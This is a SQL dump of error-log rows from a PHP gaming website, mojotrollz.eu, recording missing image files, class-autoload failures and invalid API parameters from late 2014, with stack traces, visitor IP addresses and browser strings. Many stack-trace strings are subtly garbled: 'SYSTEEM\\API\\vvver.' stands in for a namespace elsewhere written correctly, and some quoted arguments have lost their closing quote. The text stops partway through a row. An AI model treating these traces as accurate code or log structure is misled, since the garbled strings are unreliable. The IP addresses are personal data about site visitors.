'/web/mojotrollz/api.php?call=files&cat=race&id=race%20not%20valid_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (180, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'race not valid_female.png\' found.', 'cfff92e7205b15244d93efa0c9affe25cebc3227', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'race not valid_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'race not valid_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.004, '2014-11-14 01:36:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=race%20not%20valid_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (181, 'SYSTEM\\LOG\\ERROR', 'Class not found: user_achievements', '577453c73b9c6a655a3d525881e2bd69945566b1', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'user_achievemen...\')\n#1 [internal function]: spl_autoload_call(\'user_achievemen...\')\n#2 /home/web/webdir/mojotrollz/system/page/State.php(11): method_exists(\'user_achievemen...\', \'css\')\n#3 /home/web/webdir/mojotrollz/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'2\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'2\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#7 {main}', '37.24.151.115', 0.048, '2014-11-16 20:42:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pages&group=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 11, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (182, 'SYSTEM\\LOG\\ERROR', 'Class not found: user_user_achievements', 'b5d09330b139251f6dda54b451e0ee4fb747664d', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'user_user_achie...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(67): spl_autoload_call(\'user_user_achie...\')\n#2 [internal function]: page_mojotrollz::page_user_achievements()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'page_mojotrollz\', Array, 1, false, true)\n#5 {main}', '37.24.151.115', 0.004, '2014-11-10 03:22:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (347, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\GET_BASE_DATA', '0823e5fdff68be03fae8a617d14c93393188d8aa', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\GET_BASE_DA...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(110): spl_autoload_call(\'DBD\\\\GET_BASE_DA...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(256): user_achievements_content->menu_quest()\n#3 /home/web/webdir/mojotrollz/index.php(12): user_achievements_content->html()\n#4 {main}', '129.206.202.136', 0.052, '2014-11-28 11:49:12', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_content&menu=5&filter=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (193, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=info&json={%22gender%22%20:%20%22male%22}', 'cc20bcfc9a2aac67e6b227d558da9d4dfd17d302', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.016, '2014-11-14 15:03:38', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=info&json={%22gender%22%20:%20%22male%22}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (230, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'mojologo.png\' found.', '3fe321db9e5382ba1b56b4c2623f956a9cf0d7a1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'mojologo.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'mojologo.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '93.204.81.49', 0.32801, '2014-11-19 13:07:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=mojologo.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (418, 'SYSTEM\\LOG\\ERROR', 'No call given for the api', '4b24349672933d739f273edb30af772bfa68d391', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 100, '#0 /home/web/webdir/mojotrollz/system/api/api.php(23): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz\')\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '50.57.104.33', 0.012, '2014-12-07 06:20:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (187, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'race not valid_default.png\' found.', '6d2c9b317b29d5b6995383104dfb682c230a56a2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'race not valid_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'race not valid_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '130.83.120.117', 0.06, '2014-11-14 13:00:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=race%20not%20valid_default.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4', 0, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (197, 'SYSTEM\\LOG\\ERROR', 'Class not found: user_achievements_menu_sub', 'fc70e914296a66ab24d8d4ceb8559b9d3b5ce50b', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'user_achievemen...\')\n#1 [internal function]: spl_autoload_call(\'user_achievemen...\')\n#2 /home/web/webdir/mojotrollz/system/page/State.php(11): method_exists(\'user_achievemen...\', \'css\')\n#3 /home/web/webdir/mojotrollz/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'2\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'2\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#7 {main}', '37.24.148.197', 0.012, '2014-11-16 20:46:08', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pages&group=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (188, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_visuals_flag_js', '459f79cca9a41ed079b4af8b152a0c01ec0eaa1e', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.028, '2014-11-14 13:39:24', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&js=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (203, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\IMG\\img', 'd9790a2fa44e698f1f58618f579d96e474ce12f4', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\IMGG\\\\imm)\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/wizard_spawn/wizard_spawn.php(15): spl_autoload_call(\'SYSTEM\\\\IMGG\\\\imm)\n#2 /home/web/webdir/mojotrollz/index.php(12): wizard_spawn->html()\n#3 {main}', '37.24.148.197', 0.31201, '2014-11-17 14:45:43', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=wizard_spawn', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (183, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Ui-paperdoll-slot-empty2.png\' found.', 'd2fd2682fa81d697ba7e1a75e5d4d2893a21745e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'Ui-paperdoll-sl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'Ui-paperdoll-sl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.072, '2014-11-13 16:30:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=Ui-paperdoll-slot-empty2.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 27, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (184, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'11.png\' found.', '080c28519f094b5c602986033159e3e717f7b04c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'class\', \'11.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'class\', \'11.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.02, '2014-11-13 16:16:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=class&id=11.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (185, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'help_questionmark.png\' found.', '2bf07f1c2732df94d21985872e3b17760c3c2c7e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'help_questionma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'help_questionma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-14 00:24:11', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=help_questionmark.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 21, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (186, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'4_female.png\' found.', '04a67a1d5064c83298c18b14927b644aec062481', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'4_female.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'4_female.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-14 01:32:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=4_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (189, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_visuals_flag_css', 'fcce071f009055b6b446416b4495844dd6515f7f', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.032, '2014-11-14 13:39:24', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&css=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (190, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=visuals&race=1', '1ae78d6760527eb18e2265e7385a00f30656e3a0', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.064, '2014-11-14 13:44:41', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=visuals&race=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (191, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=visuals&race=2', 'a453f0735d12cea53e5c47d9a680d86795d56ed1', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.016, '2014-11-14 13:44:40', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=visuals&race=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (192, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_visuals_action_visuals', 'd3aa1347a0c8d065b0e30e9a6e2541cc3899221a', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.012, '2014-11-14 13:45:12', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=visuals&race=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (194, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=info&json={%22char_gender%22%20:%20%22female%22}', '37ac89f78d82b9f968e0695fca3e9e662f043761', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.024, '2014-11-14 15:03:35', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=info&json={%22char_gender%22%20:%20%22female%22}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (195, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: race Verifier: INT', '9e7f7cd98475bf20677a503b0befdea78fe8c8c2', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5200, \'insert\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 